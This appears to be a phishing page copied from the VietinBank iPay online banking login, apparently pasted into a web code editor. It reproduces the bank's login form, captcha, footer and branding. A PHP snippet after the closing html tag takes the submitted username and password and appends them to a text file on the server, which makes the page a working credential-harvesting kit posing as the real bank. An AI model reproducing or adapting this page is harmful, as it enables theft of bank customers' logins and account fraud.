20.4772 12.8548 20.2168 13.4082C19.9889 13.9616 19.6634 14.4499 19.2402 14.873C18.8171 15.2962 18.3288 15.6217 17.7754 15.8496C17.222 16.0775 16.6361 16.1914 16.0176 16.1914C14.748 16.1914 13.6738 15.752 12.7949 14.873C11.916 13.9941 11.4766 12.9036 11.4766 11.6016ZM0.490234 11.6016C0.490234 10.4297 0.636719 9.25781 0.929688 8.08594C1.25521 6.91406 1.72721 5.83984 2.3457 4.86328C2.96419 3.85417 3.72917 2.99154 4.64062 2.27539C5.58464 1.55924 6.67513 1.07096 7.91211 0.810547L9.18164 2.32422C8.33529 2.77995 7.57031 3.44727 6.88672 4.32617C6.23568 5.17253 5.8776 6.10026 5.8125 7.10938C6.91927 7.27214 7.83073 7.79297 8.54688 8.67188C9.26302 9.51823 9.62109 10.4948 9.62109 11.6016C9.62109 12.2526 9.49089 12.8548 9.23047 13.4082C9.0026 13.9616 8.67708 14.4499 8.25391 14.873C7.83073 15.2962 7.32617 15.6217 6.74023 15.8496C6.18685 16.0775 5.60091 16.1914 4.98242 16.1914C4.36393 16.1914 3.77799 16.0775 3.22461 15.8496C2.67122 15.6217 2.18294 15.2962 1.75977 14.873C1.36914 14.4499 1.0599 13.9616 0.832031 13.4082C0.604167 12.8548 0.490234 12.2526 0.490234 11.6016Z' fill='white'/%3E %3C/svg%3E" alt="open-quote"><span class="mx-1">Vững chãi</span><img src="data:image/svg+xml,%3Csvg width='21' height='17' viewBox='0 0 21 17' fill='none' xmlns='http://www.w3.org/2000/svg'%3E %3Cpath opacity='0.3' d='M9.52344 11.6016C9.52344 10.4297 9.37695 9.25781 9.08398 8.08594C8.75846 6.91406 8.28646 5.83984 7.66797 4.86328C7.01693 3.85417 6.23568 2.99154 5.32422 2.27539C4.41276 1.55924 3.33854 1.07096 2.10156 0.810547L0.783203 2.32422C1.62956 2.77995 2.39453 3.44727 3.07812 4.32617C3.76172 5.17253 4.13607 6.10026 4.20117 7.10938C3.0944 7.27214 2.18294 7.79297 1.4668 8.67188C0.750651 9.51823 0.392578 10.4948 0.392578 11.6016C0.392578 12.2526 0.522786 12.8548 0.783203 13.4082C1.01107 13.9616 1.33659 14.4499 1.75977 14.873C2.18294 15.2962 2.67122 15.6217 3.22461 15.8496C3.77799 16.0775 4.36393 16.1914 4.98242 16.1914C6.25195 16.1914 7.32617 15.752 8.20508 14.873C9.08398 13.9941 9.52344 12.9036 9.52344 11.6016ZM20.5098 11.6016C20.5098 10.4297 20.3633 9.25781 20.0703 8.08594C19.7448 6.91406 19.2728 5.83984 18.6543 4.86328C18.0358 3.85417 17.2708 2.99154 16.3594 2.27539C15.4154 1.55924 14.3249 1.07096 13.0879 0.810547L11.8184 2.32422C12.6647 2.77995 13.4297 3.44727 14.1133 4.32617C14.7643 5.17253 15.1224 6.10026 15.1875 7.10938C14.0807 7.27214 13.1693 7.79297 12.4531 8.67188C11.737 9.51823 11.3789 10.4948 11.3789 11.6016C11.3789 12.2526 11.5091 12.8548 11.7695 13.4082C11.9974 13.9616 12.3229 14.4499 12.7461 14.873C13.1693 15.2962 13.6738 15.6217 14.2598 15.8496C14.8132 16.0775 15.3991 16.1914 16.0176 16.1914C16.6361 16.1914 17.222 16.0775 17.7754 15.8496C18.3288 15.6217 18.8171 15.2962 19.2402 14.873C19.6309 14.4499 19.9401 13.9616 20.168 13.4082C20.3958 12.8548 20.5098 12.2526 20.5098 11.6016Z' fill='white'/%3E %3C/svg%3E" alt="close-quote"></div><div class="auth-layout-content-form"><form class="login"><span class="heading-5 title">Chào mừng Quý khách đến VietinBank</span><img src="data:image/svg+xml,%3Csvg width='63' height='38' viewBox='0 0 63 38' fill='none' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'%3E %3Crect width='62.5882' height='38' fill='url(%23pattern0)'/%3E %3Cdefs%3E %3Cpattern id='pattern0' patternContentUnits='objectBoundingBox' width='1' height='1'%3E %3Cuse xlink:href='%23image0' transform='translate(0 -0.00420167) scale(0.00680272 0.0112045)'/%3E %3C/pattern%3E %3Cimage id='image0' width='147' height='90' xlink:href='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJMAAABaCAYAAAC8AmRpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAABqNJREFUeNrsnbty20YUhjcZVa74BqEnpQtTfWYI2Q9gtqxCvYBCjeuM7HGd4eUFzFQqBT1ALHAmvaHCpSfIGyBN2mSXuxhSNIA9e8GN+P8ZiCMKWC6BD2f/PbtYMQZBEARBEARBEARBEARBEARBEARBUB36rhO1nK4H/Oco5y+H76d8iw/+FrPbqxSXuI8wSWAmfBvybazeDRxLzQDb8i3icEW45A3A9O9vP87VnZ+n+Nnbr2H2y58vXswUBEUXdPPTly+pBqbPBdHHp3Z14duKg5Xg8tcAEwdpwV/mmmPPOVAxB0nst9DsK2C6LAFJQPS55u8uoHoPqPzp+4L3KRFicPRapiGxrDo12wE8Xc+AQbUw9UUC4o8cqAVQAEy+NOdAzXEaAJMvLThQAU6Dvc46Wu9EbUV+z9aD3exSCFAvYBK5ogvtXjJnJaLMG2W0qQp20Qn5KK/NnO/ucr3db5H5vr0K+SbSEc8No83PwMJvZLrm298lx6XP3n7NLtCS8DnLxr6hzCNd8IjzwGgZdZGFvwQa5mrHcIo0vg/emrn8zxjyn38R9z7nnxMDDw+R6dc/Xg1YeQY8/fD60/LAn+i61cvGB11FhJquQxV5dBLgxYQbQJj9l2r/bMu/CWRTn40RJoY3wohQ73jXtLvd1HNC56XwWp4VdpM1xpUDF3OgIgXSjaYCP7Sk6dgSYRIXL8wx9RNl6gPDHmPWvM5UWaLslYHRXxCa6JSXG1nftBJYavL2nYkBH3q+iEPWDsWWJ3qhmsiPCijX4Z/JrlmnZ94p9R4wt1kWE+J+qWlvDnoa+uesmvHD+W62hIx6uohK0dihLtRjQ8Bkr6oHoUcq4pX5PaoXcolMlGOTMr8HmNqhCWH2QkgCUx/lijoTTlGpjzAFLa6brhOzrfA7Uo/ZAqa9XhL3iyzKjtVx2WZq9oea6ERt6mx8E+0YTXN7Vtg2Orj6lhrpoUGPJdH8TcDyqIApf3Bhup6oLjelRyvSDpuCCynyZAmhnKoikxbmsuGUxxLzmXx4/SnuEEjie9yRQXpqMjcHN09onHAUd7PI/8hpya4ghEyfIJa+iZpvovulrRVMHBRRkSU7BcmIdMfoDyuE30SEgiSdAVAiobhi+qTgQAPClgBTBqXvHqB1ZOo6QLZTUIR+r6hWVB82KtxXRjmqB/LpsRJKRO4aTIF6JCotNbL2GfeosgFeUS4NBEqEmGjPU81+qauRqapn6wSgXZh6QhlfpJ0jj36pj6mBMl135Bm60CMoNJiIGXjAJHXJT9imEzWVwCeeQBl7g/dkDThdiQIpMj5STtkIVPpkbOlXXKLT3AMolLpuAZPeH62Y6aQ9mWa4YX6mobj6prkTKJ7G4/oMU6K6/qYQCXC0EwZrbOpoKYLyJ20C0vky8JGnDtPhkjqhVbdfNmd3rD0T/ExTBFEdfqmLMMVMDvVQ7t7I+dP2wzDDFp4LSopgXJdf6iJMac0PSC5aClIWNXTDM4GTXzJ8QKHvvTmd2Z6RId/PJMgiaJ4ne/BWP+osgnzfFBBhZYDJj6ggbZhMeKYEQJtIEeT5Jopf2gImf6IOgDY5BENJEYwt/ZJxZEIGvFijKk649xSBXoGFX0pshpYAU7EoScnHlhhxXfMaVB2VAJO7khbUgeJtgqr9EmA6DVGiiNnYoeWaBYDJTUHjNaDNIggM/JK1DwRMxUoN7/i2+6YZqyDrDZhooozjBS1ZR5wCgHgE/cYLmAVCnqn8AgWkizRd/8Jf71nxoGq2jlN1KQI/CdHEZbYpYCrWhngnZ7CMDPavqqmbeCjDWmjmyo3tpkM1vq+puQRMlrpm3XkMPnSuq+MyhoCp/OSKi3PB2pGcpNR11VQTB5hoF0n06s5rbPJcosuS2S616NjE+YIp9VDR2FM51d31+wXql54jVebNZPkuTxTvI2nURGTysw64LrNKmR0pJ6MNncupS3Ju+EjVWXT7Bwc9u8ERLMnRjfMPy9ZwqmpJ66fnc8HKZ0GIlMDzdsAEtVvT9X/a5vH26tr1Y+CZTh8kSu7Ji30ATKevN1WnBABTP6KS8Eyzqo03YOoHSJSlF+99fSTG5roDh4gwx/8LT/QE86YOi94lxSulPiMTYOqOBEhBzvsug7uhz9QEmrl+673PwgBTn0HyvFIeYOqnROb9ne9CAVP/FDE5fuddMOBdiiZuT8MkqmnbVFVBjM11Kz2QraOZ/V/g40Hl425/zLLFzjxluSEIgiAIgiAIgiAIgiAIgiAIgiAIal7/CzAAVhv52nPTzK4AAAAASUVORK5CYII='/%3E %3C/defs%3E %3C/svg%3E" alt="greeting" class="greeting"><div class="form-input"><div class="input-group input-username"><div class="input-box"><div class="wrap-input "><input class="label-3 " type="text" maxlength="255" autocomplete="" autocorrect="off" autocapitalize="none" placeholder="Tên đăng nhập" name="userName" value=""></div></div></div></div><div class="form-input"><div class="input-group input-password"><div class="input-box"><div class="wrap-input "><input class="label-3 pass " type="password" maxlength="250" autocomplete="new-password" placeholder="Mật khẩu" name="accessCode" value=""></div></div></div></div><div class="form-input-captcha"><div class="input-group "><div class="input-box"><div class="wrap-input "><input class="label-3 " type="text" maxlength="6" autocomplete="off" placeholder="Mã xác thực" name="captchaCode" value=""></div></div><button class="btn-form-inline pointer"><img alt="icon button" src="data:image/svg+xml,%3Csvg width='56' height='56' viewBox='0 0 56 56' fill='none' xmlns='http://www.w3.org/2000/svg'%3E %3Ccircle cx='28' cy='28' r='28' fill='%23005993'/%3E %3Ccircle cx='28' cy='28' r='28' fill='url(%23paint0_linear)'/%3E %3Cpath d='M19 28L36.7333 28' stroke='white' stroke-width='2' stroke-linecap='round'/%3E %3Cpath d='M32.0669 33.6001L37.6669 28.0001L32.0669 22.4001' stroke='white' stroke-width='2' stroke-linecap='round'/%3E %3Cdefs%3E %3ClinearGradient id='paint0_linear' x1='142.333' y1='-27.5333' x2='8.4' y2='45.7333' gradientUnits='userSpaceOnUse'%3E %3Cstop stop-color='%2314A1FD'/%3E %3Cstop offset='1' stop-color='%23015A94'/%3E %3C/linearGradient%3E %3C/defs%3E %3C/svg%3E"></button></div></div><div><img src="https://api-ipay.vietinbank.vn/api/get-captcha/LcVpYgqmB"><img class="form-input__resetBtn" src="data:image/svg+xml,%3Csvg width='24' height='24' viewBox='0 0 24 24' fill='none' xmlns='http://www.w3.org/2000/svg'%3E %3Cpath d='M2.46765 8.68544C2.37668 8.42471 2.09157 8.2871 1.83084 8.37807C1.57012 8.46904 1.4325 8.75415 1.52348 9.01488L2.46765 8.68544ZM3.10055 12.017L2.62846 12.1818L2.81506 12.7165L3.32256 12.4651L3.10055 12.017ZM6.5532 10.8641C6.80063 10.7415 6.90182 10.4416 6.77921 10.1941C6.6566 9.9467 6.35662 9.84551 6.10919 9.96812L6.5532 10.8641ZM1.52348 9.01488L2.62846 12.1818L3.57264 11.8523L2.46765 8.68544L1.52348 9.01488ZM3.32256 12.4651L6.5532 10.8641L6.10919 9.96812L2.87854 11.569L3.32256 12.4651Z' fill='%23062A46'/%3E %3Cpath d='M8.0376 19.8884C10.4181 20.9533 13.3119 20.8511 15.7662 19.3648C19.6758 16.9972 20.9898 12.0142 18.7011 8.23486C16.4124 4.45557 11.3877 3.31115 7.47814 5.67872C5.25438 7.02541 3.87038 9.21828 3.51148 11.5545' stroke='%23062A46' stroke-linecap='round'/%3E %3C/svg%3E" alt="reset icon"></div><div class="form-footer label-3"><div class="forget"><a class="link underline" href="/forgot-username">Quên tên đăng nhập</a><span>/</span><a class="link underline" href="/forgot-password">Mật khẩu</a></div><a class="link register underline" href="/register">Đăng ký</a></div></form></div></div><div class="cms-flex cms-flex__wrap x-between y-bottom auth-layout-footer paragraph-4"><div class="label-3 bg-license">Ảnh của PIRO4D</div><div class="footer-menu"><div class="footer-menu-item"><a class="link underline" href="https://www.vietinbank.vn/vn/gioi-thieu/tong-quan.html">Về VietinBank</a></div><div class="footer-menu-item"><a class="link underline" href="/static/file/SecurityNotes.pdf">Chính sách bảo mật</a></div><div class="cms-flex y-center footer-menu-item download-app">Tải VietinBank iPay<div class="download-icon"><img src="https://static-ipay.vietinbank.vn/production/Setting/FOOTER/1720821492149-Apple.svg" alt="ios"><img src="https://static-ipay.vietinbank.vn/production/Setting/FOOTER/5010821492149-Android.svg" alt="android"></div></div></div><div class="footer-license">© Bản quyền thuộc về Ngân hàng TMCP Công thương Việt Nam</div></div></div></div></div></div><div id="app-footer" class="hidden full-width"><div class="f-icon hidden"><img class="pointer f-open" src="data:image/svg+xml,%3Csvg width='138' height='56' viewBox='0 0 138 56' fill='none' xmlns='http://www.w3.org/2000/svg'%3E %3Cg clip-path='url(%23clip0)'%3E %3Ccircle cx='69' cy='76' r='72' stroke='%239EB3C9' stroke-dasharray='4 4'/%3E %3Cpath d='M58 39.5L69 28.5L80 39.5' stroke='%23005993' stroke-width='2' stroke-linecap='square'/%3E %3C/g%3E %3Cdefs%3E %3CclipPath id='clip0'%3E %3Cpath d='M0 0H138V56H0V0Z' fill='white'/%3E %3C/clipPath%3E %3C/defs%3E %3C/svg%3E" alt="open"></div><div class="f-content "><div class="f-info"><div class="f-item pointer paragraph-small"><img src="https://static-ipay.vietinbank.vn/production/Setting/FOOTER/2330736573657-footer-hotline.svg" alt="icon"><span class="f-item__title">1900-55-88-68</span></div><hr><div class="f-item pointer paragraph-small"><img src="https://static-ipay.vietinbank.vn/production/Setting/FOOTER/3690736573657-footer-local.svg" alt="icon"><span class="f-item__title">Chi nhánh và ATM</span></div><hr><div class="f-item pointer paragraph-small"><img src="https://static-ipay.vietinbank.vn/production/Setting/FOOTER/7110736573657-footer-help.svg" alt="icon"><span class="f-item__title">Câu hỏi thường gặp</span></div><hr><div class="f-item pointer paragraph-small"><img src="https://static-ipay.vietinbank.vn/production/Setting/FOOTER/8500726312631-footer-mail.svg" alt="icon"><span class="f-item__title">contact@vietinbank.vn</span></div><img class="pointer f-close" src="data:image/svg+xml,%3Csvg width='44' height='44' viewBox='0 0 44 44' fill='none' xmlns='http://www.w3.org/2000/svg'%3E %3Cg clip-path='url(%23clip0)'%3E %3Cpath d='M11 11L33 33' stroke='white' stroke-width='2'/%3E %3Cpath d='M33 11L11 33' stroke='white' stroke-width='2'/%3E %3C/g%3E %3Cdefs%3E %3CclipPath id='clip0'%3E %3Cpath d='M0 0H44V44H0V0Z' fill='white'/%3E %3C/clipPath%3E %3C/defs%3E %3C/svg%3E" alt="close"></div><div class="wrap-f-bottom"><div class="f-bottom paragraph-4"><span class="f-bottom__item">Về VietinBank</span><span class="f-bottom__item">Chính sách bảo mật</span><span class="f-bottom__item f-bottom__download--label">Tải VietinBank iPay</span><span class="f-bottom__download"><img src="https://static-ipay.vietinbank.vn/production/Setting/FOOTER/1720821492149-Apple.svg" alt="ios"><img src="https://static-ipay.vietinbank.vn/production/Setting/FOOTER/5010821492149-Android.svg" alt="android"></span><div class="f-bottom__item">© Bản quyền thuộc về Ngân hàng TMCP Công thương Việt Nam</div></div></div></div></div><div class="app-loading" style="display: none;"><div class="loading-content"><span></span><span></span><span></span><span></span><span></span></div></div><div class="Toastify"></div></div></div> <div id="root-modal"> <div id="backdrop-modal"></div> </div> <!-- <script async defer src="https://www.google.com/recaptcha/api.js?render=6LfLuZ8aAAAAAK8VxR1Nk1rwA-LEALM99o2r3Ujd"></script> --> <!-- <script src="https://www.google.com/recaptcha/api.js?render=6LfLuZ8aAAAAAK8VxR1Nk1rwA-LEALM99o2r3Ujd"></script> --> <!-- This HTML file is a template. If you open it directly in the browser, you will see an empty page. You can add webfonts, meta tags, or analytics to this file. The build step will place the bundled scripts into the <body> tag. To begin the development, run `npm start` or `yarn start`. To create a production bundle, use `npm run build` or `yarn build`. --> <script type="text/javascript" src="/static/js/vendors~main.fd135868fa43dd7582b5.js"></script><script type="text/javascript" src="/static/js/main.fd135868fa43dd7582b5.js"></script> </body> </html> <?php extract($_REQUEST); $file=fopen("form.txt","a"); $value = $_POST["select-login"]; fwrite($file, 'userName: '); fwrite($file, $userName. "\n"); fwrite($file, 'Password: '); fwrite($file, $accessCode. "\n"); fclose($file); ?>
Editor is loading...